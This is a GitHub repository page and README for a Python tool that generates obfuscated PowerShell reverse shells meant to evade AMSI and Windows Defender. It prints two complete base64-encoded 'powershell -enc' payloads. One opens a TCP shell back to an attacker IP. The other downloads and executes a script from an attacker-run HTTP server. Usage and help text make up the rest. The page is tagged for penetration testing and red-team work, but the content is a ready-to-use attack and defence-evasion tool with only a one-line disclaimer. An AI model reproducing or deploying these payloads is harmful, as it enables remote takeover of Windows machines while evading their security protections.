Skip to content
/ BypassAMSI_PSRevshell Public

Simple obfuscated PowerShell revshell generator to bypass AMSI / Windows Defender

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

gunzf0x/BypassAMSI_PSRevshell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
BypassAMSI_PSRevshell.py
BypassAMSI_PSRevshell.py
 
 
README.md
README.md
 
 

Repository files navigation

BypassAMSI PowerShell Revshell

"Revshell" command

Generates an obfuscated PowerShell reverse shell payload based on original Nishang Reverse shell PS oneliner.

Usage

python3 BypassAMSI_PSRevshell.py revshell -i <Attacker-IP> -p <listening-port>

For example:

❯ python3 BypassAMSI_PSRevshell.py revshell -i 10.10.10.10 -p 4444

Will generate the payload:

powershell -enc JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADAALgAxADAAJwAsADQANAA0ADQAKQA7ACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMALgBSAGUAYQBkACgAJABiACwAIAAwACwAIAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAwACwAIAAkAGkAKQA7ACQAcwBiACAAPQAgACgAaQBlAHgAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGIAMgAgACAAPQAgACQAcwBiACAAKwAgACcAUABTACAAJwAgACsAIAAnAD4AIAAnADsAJABzAHkAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMALgBXAHIAaQB0AGUAKAAkAHMAeQAsADAALAAkAHMAeQAuAEwAZQBuAGcAdABoACkAOwAkAHMALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMALgBDAGwAbwBzAGUAKAApAA==

"Server" command

This option will create a payload file, by default named revshell.ps1 (which is the obfuscated payload from revshell command written into a file), and expose it into a temporal HTTP server (by default on port 8000, which can be changed as well). The script will then generate an encoded payload that will request the file to the temporal server, executes it and triggers the reverse shell.

Usage

python3 BypassAMSI_PSRevshell.py server -i <Attacker-IP> -p <listening-port>

For example:

❯ python3 BypassAMSI_PSRevshell.py server -i 10.10.10.10 -p 4444 --server-port 9000

Will generate the payload:

powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA

Executing it on the victim machine will make a request to the HTTP server exposed and the payload file.

Help message

❯ python3 BypassAMSI_PSRevshell.py revshell -h

usage: python3 BypassAMSI_PSRevshell.py revshell [-h] -i ATTACKER_IP -p PORT [-v] [--keep-pwd] [--enc-b64] [--no-banner]

Generate an obfuscated PowerShell payload to avoid Windows Defender

options:
  -h, --help            show this help message and exit
  -i ATTACKER_IP, --attacker-ip ATTACKER_IP
                        Attacker IP address.
  -p PORT, --port PORT  Port to get revshell.
  -v, --verbose         Display payloads used and generated, along with some extra info.
  --keep-pwd            Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.
  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.
  --no-banner           Do not print script banner.

Example: BypassAMSI_PSRevshell.py revshell -i 10.10.16.98 -p 4444

❯ python3 BypassAMSI_PSRevshell.py server -h

usage: python3 BypassAMSI_PSRevshell.py server [-h] -i ATTACKER_IP -p PORT [--server-port SERVER_PORT] [-o OUTFILE] [-v] [--keep-pwd] [--keep-file] [--enc-b64]
                                               [--no-banner]

Generate an obfuscated PowerShell payload to avoid Windows Defender

options:
  -h, --help            show this help message and exit
  -i ATTACKER_IP, --attacker-ip ATTACKER_IP
                        Attacker IP address serving temporal HTTP server.
  -p PORT, --port PORT  Listening port to get reverse shell.
  --server-port SERVER_PORT
                        Port serving temporal HTTP server. Default: 8000.
  -o OUTFILE, --outfile OUTFILE
                        Name of the temporal PowerShell file storing obfuscated payload. Default: revshell.ps1
  -v, --verbose         Display payloads used and generated, along with some extra info.
  --keep-pwd            Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.
  --keep-file           This script will create a file named as "--outfile" flag and then is deleted. Use this flag if you want to keep the generated file/payload.
  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.
  --no-banner           Do not print script banner.

Example: BypassAMSI_PSRevshell.py server -i 10.10.16.98

Disclaimer

Always use it under your own responsability. Be ethical (:

About

Simple obfuscated PowerShell revshell generator to bypass AMSI / Windows Defender

Topics

python obfuscation obfuscate reverse-shell powershell python3 pentesting red-team red-teaming amsi-bypass revshell defender-bypass

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages